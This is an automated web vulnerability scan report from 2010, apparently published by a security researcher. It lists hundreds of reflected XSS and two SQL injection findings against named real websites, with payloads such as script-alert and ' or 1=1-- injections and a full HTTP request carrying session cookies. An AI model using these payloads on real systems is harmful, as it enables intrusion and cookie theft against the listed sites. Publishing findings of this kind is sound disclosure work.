Report generated by XSS.CX at Sat Nov 20 12:20:48 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. SQL injection

1.1. http://www.ask.com/jsignin [REST URL parameter 1]

1.2. http://www.ask.com/local [gc cookie]

2. Cross-site scripting (reflected)

2.1. http://ad.vulnerable.ad.partner/adj/Auctions/ros [kw parameter]

2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]

2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

2.4. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

2.5. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

2.6. http://auction.nhl.com/cgi-bin/ncommerce3/User [type parameter]

2.7. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]

2.8. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]

2.9. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.10. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.11. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.12. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]

2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

2.15. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]

2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

2.18. https://checkout.netsuite.com/s.nl [vid parameter]

2.19. http://dictionary.reference.com/browse/turn [REST URL parameter 2]

2.20. http://digg.com/submit [REST URL parameter 1]

2.21. http://ds.addthis.com/red/psi/p.json [callback parameter]

2.22. http://ds.addthis.com/red/psi/sites/www.directpointe.com/p.json [callback parameter]

2.23. http://images.ask.com/pictures [q parameter]

2.24. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.25. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.26. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.27. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.28. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.29. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.30. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.31. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.32. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.33. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.42. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.43. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.44. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.45. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.46. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.47. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.48. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.49. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.50. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.51. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.52. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.53. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.54. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.55. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.56. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.57. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.58. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.59. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.60. http://jqueryui.com/themeroller/ [fcActive parameter]

2.61. http://jqueryui.com/themeroller/ [fcContent parameter]

2.62. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.63. http://jqueryui.com/themeroller/ [fcError parameter]

2.64. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.65. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.66. http://jqueryui.com/themeroller/ [fcHover parameter]

2.67. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.68. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.69. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.70. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.71. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.72. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.73. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.74. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.75. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.76. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.78. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.79. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.80. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.81. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.82. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

2.85. http://siteanalytics.compete.com/DOMAIN/ [REST URL parameter 1]

2.86. http://ss.ask.com/query [fn parameter]

2.87. http://ss.ask.com/query [q parameter]

2.88. http://static.wix.com/client/getComponentsTypeList.php [componentTypeViewerList parameter]

2.89. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.90. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.92. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

2.93. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]

2.95. http://www.addthis.com/favicon.ico [REST URL parameter 1]

2.96. http://www.addthis.com/favicon.ico [REST URL parameter 1]

2.97. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

2.98. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

2.99. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

2.100. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

2.101. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

2.102. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

2.103. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

2.104. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

2.105. http://www.addthis.com/services/submit [REST URL parameter 1]

2.106. http://www.addthis.com/services/submit [REST URL parameter 1]

2.107. http://www.addthis.com/services/submit [REST URL parameter 2]

2.108. http://www.addthis.com/services/submit [REST URL parameter 2]

2.109. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

2.110. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

2.111. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

2.112. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

2.113. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

2.114. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]

2.116. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

2.117. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

2.118. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

2.119. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

2.120. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

2.121. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]

2.123. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

2.124. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

2.125. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

2.126. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

2.127. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

2.128. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]

2.130. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

2.131. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

2.132. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

2.133. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

2.134. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

2.135. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]

2.137. http://www.ask.com/pictures [l parameter]

2.138. http://www.ask.com/pictures [l parameter]

2.139. http://www.ask.com/pictures [q parameter]

2.140. http://www.ask.com/pictureslanding [l parameter]

2.141. http://www.ask.com/pictureslanding [q parameter]

2.142. http://www.ask.com/web [q parameter]

2.143. http://www.ask.com/web [qid parameter]

2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]

2.145. http://www.dcgla.com/includes/testimonial.php [id parameter]

2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]

2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]

2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]

2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]

2.150. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.151. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.152. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.153. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.154. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.155. http://www.mapquest.com/maps/map.adp [country parameter]

2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]

2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]

2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]

2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]

2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]

2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]

2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]

2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]

2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]

2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]

2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]

2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]

2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]

2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]

2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]

2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]

2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]

2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]

2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]

2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]

2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]

2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]

2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]

2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]

2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]

2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]

2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]

2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]

2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]

2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]

2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]

2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]

2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]

2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]

2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]

2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]

2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]

2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]

2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]

2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]

2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]

2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]

2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]

2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]

2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]

2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]

2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]

2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]

2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]

2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]

2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]

2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]

2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]

2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]

2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]

2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]

2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]

2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]

2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]

2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]

2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]

2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]

2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]

2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]

2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]

2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]

2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]

2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]

2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]

2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]

2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]

2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]

2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]

2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]

2.230. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]

2.231. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]

2.232. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]

2.233. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]

2.234. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]

2.235. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]

2.236. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]

2.237. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]

2.238. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]

2.239. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]

2.240. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]

2.241. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]

2.242. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]

2.243. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]

2.244. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]

2.245. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]

2.246. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]

2.247. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]

2.248. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]

2.249. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]

2.250. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]

2.251. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]

2.252. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]

2.253. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]

2.254. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]

2.255. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]

2.256. http://medienfreunde.com/ [Referer HTTP header]

2.257. http://player.vimeo.com/video/14121087 [Referer HTTP header]

2.258. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.259. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.260. http://www.directpointe.com/ [Referer HTTP header]

2.261. http://www.directpointe.com/consultation.aspx [Referer HTTP header]

2.262. http://www.directpointe.com/landing_pages/states/california.aspx [Referer HTTP header]

2.263. http://www.directpointe.com/regional.aspx [Referer HTTP header]

2.264. http://www.directpointe.com/solutions/additional_services.aspx [Referer HTTP header]

2.265. http://www.directpointe.com/solutions/cloud_computing.aspx [Referer HTTP header]

2.266. http://www.directpointe.com/solutions/faq.aspx [Referer HTTP header]

2.267. http://www.directpointe.com/solutions/index.aspx [Referer HTTP header]

2.268. http://www.directpointe.com/solutions/industry_solutions.aspx [Referer HTTP header]

2.269. http://www.directpointe.com/solutions/network_services.aspx [Referer HTTP header]

2.270. http://www.directpointe.com/solutions/newsletter.aspx [Referer HTTP header]

2.271. http://www.directpointe.com/solutions/pc_services.aspx [Referer HTTP header]

2.272. http://www.directpointe.com/solutions/print_services.aspx [Referer HTTP header]

2.273. http://www.directpointe.com/solutions/professional_services.aspx [Referer HTTP header]

2.274. http://www.directpointe.com/solutions/server_services.aspx [Referer HTTP header]

2.275. http://www.directpointe.com/solutions/virtual_services.aspx [Referer HTTP header]

2.276. http://www.directpointe.com/thanks.aspx [Referer HTTP header]

2.277. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

2.278. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 1]

2.279. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 2]

2.280. http://www.ask.com/ [wz_uid cookie]

2.281. http://www.ask.com/about [user cookie]

2.282. http://www.ask.com/ans [wz_uid cookie]

2.283. http://www.ask.com/blogsearch [wz_uid cookie]

2.284. http://www.ask.com/homepage [wz_uid cookie]

2.285. http://www.ask.com/pictureslanding [user cookie]

2.286. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 [wz_uid cookie]

2.287. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES [wz_uid cookie]

2.288. http://www.ask.com/video [wz_uid cookie]

2.289. http://www.ask.com/web [wz_uid cookie]

2.290. http://www.ask.com/web [wz_uid cookie]

2.291. http://www.ask.com/web [wz_uid cookie]



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.ask.com/jsignin [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ask.com
Path:   /jsignin

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 25257047'%20or%201%3d1--%20 and 25257047'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /jsignin25257047'%20or%201%3d1--%20?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:59:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:40 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjQwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
